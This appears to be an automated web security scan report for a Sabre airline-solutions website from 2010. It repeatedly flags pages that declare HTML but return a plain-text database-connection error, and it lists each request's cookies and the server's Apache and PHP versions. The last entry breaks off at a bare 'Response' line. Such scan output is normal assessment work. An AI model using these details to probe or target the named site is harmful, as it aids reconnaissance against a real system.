GET /home/products_services/airline_reservations/my_list HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/my_list/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323238; __utmb=178985382.2.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:58:58 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/airline_reservations/my_list/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323024; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A1%3Bs%3A75%3A%22%2Fproducts_services%2Fcommercial_planning%2FSabre_AirVision_Market_Intelligence%2F%22%3Bi%3A2%3Bs%3A45%3A%22%2Fproducts_services%2Fproduct%2Fmultitask_manager%2F%22%3Bi%3A3%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fdeveloper_tool%2F%22%3Bi%3A4%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_group_ecommerce%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:57:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/airline_reservations/news HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/news/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323079; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:57:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/airline_reservations/news/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323005; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A52%3A%22%2Fproducts_services%2Fcommercial_planning%2Fbuild_profit%2F%22%3Bi%3A1%3Bs%3A43%3A%22%2Fproducts_services%2Fproduct%2Fsabresonic_sell%2F%22%3Bi%3A2%3Bs%3A54%3A%22%2Fproducts_services%2Fproduct%2Fsabre_gds_display_analysis%2F%22%3Bi%3A3%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_network_manager%2F%22%3Bi%3A4%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:57:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/airline_reservations/sabresonic_loyalty HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/sabresonic_loyalty/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323032; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fdownloads%2F%22%3Bi%3A1%3Bs%3A52%3A%22%2Fproducts_services%2Fcommercial_planning%2Fbuild_profit%2F%22%3Bi%3A2%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fsabresonic_web%2F%22%3Bi%3A3%3Bs%3A80%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing_for_third-party_ground_handling%2F%22%3Bi%3A4%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_revenue_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:57:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/airline_reservations/sabresonic_loyalty/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_reaccommodation_manager/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322291; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fbusiness_issues%2Fother_airline_issues%2F%22%3Bi%3A1%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A2%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_manager%2F%22%3Bi%3A3%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_acars_manager%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:57:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/airline_reservations/sabresonic_res HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/sabresonic_res/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323028; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A45%3A%22%2Fproducts_services%2Fairline_reservations%2Fnews%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fproducts_services%2Fcommercial_planning%2Fdownloads%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fproducts_services%2Fproduct%2Fsabresonic_check-in%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing%2F%22%3Bi%3A4%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_profit_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:57:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/airline_reservations/sabresonic_res/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_reaccommodation_manager/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322262; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A1%3Bs%3A55%3A%22%2Fproducts_services%2Fservices%2Fdelivery_and_customer_care%2F%22%3Bi%3A2%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_recovery_manager%2F%22%3Bi%3A3%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3Bi%3A4%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:57:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/airline_reservations/sabresonic_technology HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/sabresonic_technology/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323238; __utmb=178985382.2.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:57:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/airline_reservations/sabresonic_ticket HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/sabresonic_ticket/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323049; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fairline_reservations%2Fmore_customers%2F%22%3Bi%3A1%3Bs%3A60%3A%22%2Fproducts_services%2Fcommercial_planning%2Fairvision_technology%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts_services%2Fproduct%2Fweb_services%2F%22%3Bi%3A3%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Finteract_interface%2F%22%3Bi%3A4%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_slot_manager_iata%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:57:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/airline_reservations/sabresonic_ticket/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_reaccommodation_manager/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322302; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_reservations%2F%22%3Bi%3A1%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A2%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3Bi%3A4%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:57:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/airline_reservations/sabresonic_user_experience HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/sabresonic_user_experience/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323049; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fairline_reservations%2Fmore_customers%2F%22%3Bi%3A1%3Bs%3A60%3A%22%2Fproducts_services%2Fcommercial_planning%2Fairvision_technology%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts_services%2Fproduct%2Fweb_services%2F%22%3Bi%3A3%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Finteract_interface%2F%22%3Bi%3A4%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_slot_manager_iata%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:57:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/airline_reservations/sabresonic_user_experience/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_reaccommodation_manager/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322305; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fecommerce%2F%22%3Bi%3A1%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A2%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3Bi%3A4%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:57:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/commercial_planning HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/marketing_planning Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323238; __utmb=178985382.2.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:28:16 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/commercial_planning/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/marketing_planning/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323238; __utmb=178985382.2.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:28:53 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/commercial_planning/Sabre_AirVision_Market_Intelligence HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/Sabre_AirVision_Market_Intelligence/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323085; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3Bi%3A1%3Bs%3A20%3A%22%2Fincludes%2Fform_list%2F%22%3Bi%3A2%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A3%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A4%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:36:38 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/commercial_planning/Sabre_AirVision_Market_Intelligence/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/sabre_airvision_network/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322933; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A45%3A%22%2Fproducts_services%2Fproduct%2Fmultitask_manager%2F%22%3Bi%3A1%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fdeveloper_tool%2F%22%3Bi%3A2%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_group_ecommerce%2F%22%3Bi%3A3%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_manager%2F%22%3Bi%3A4%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_acars_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:30:53 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/commercial_planning/airvision_technology HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/airvision_technology/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323118; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A1%3Bs%3A55%3A%22%2Fproducts_services%2Fenterprise_operations%2Fmanage_change%2F%22%3Bi%3A2%3Bs%3A48%3A%22%2Fproducts_services%2Fairline_reservations%2Fmy_list%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A4%3Bs%3A75%3A%22%2Fproducts_services%2Fcommercial_planning%2FSabre_AirVision_Market_Intelligence%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:41:14 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/commercial_planning/airvision_technology/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/sabre_airvision_network/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322958; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A52%3A%22%2Fproducts_services%2Ftechnology%2Fsoftware_as_a_service%2F%22%3Bi%3A1%3Bs%3A51%3A%22%2Fproducts_services%2Fproduct%2Fsabre_revenue_integrity%2F%22%3Bi%3A2%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Fsabre_qik_analysis_system%2F%22%3Bi%3A3%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_in-flight%2F%22%3Bi%3A4%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_roster_maker%2F%22%3B%7D;
Response
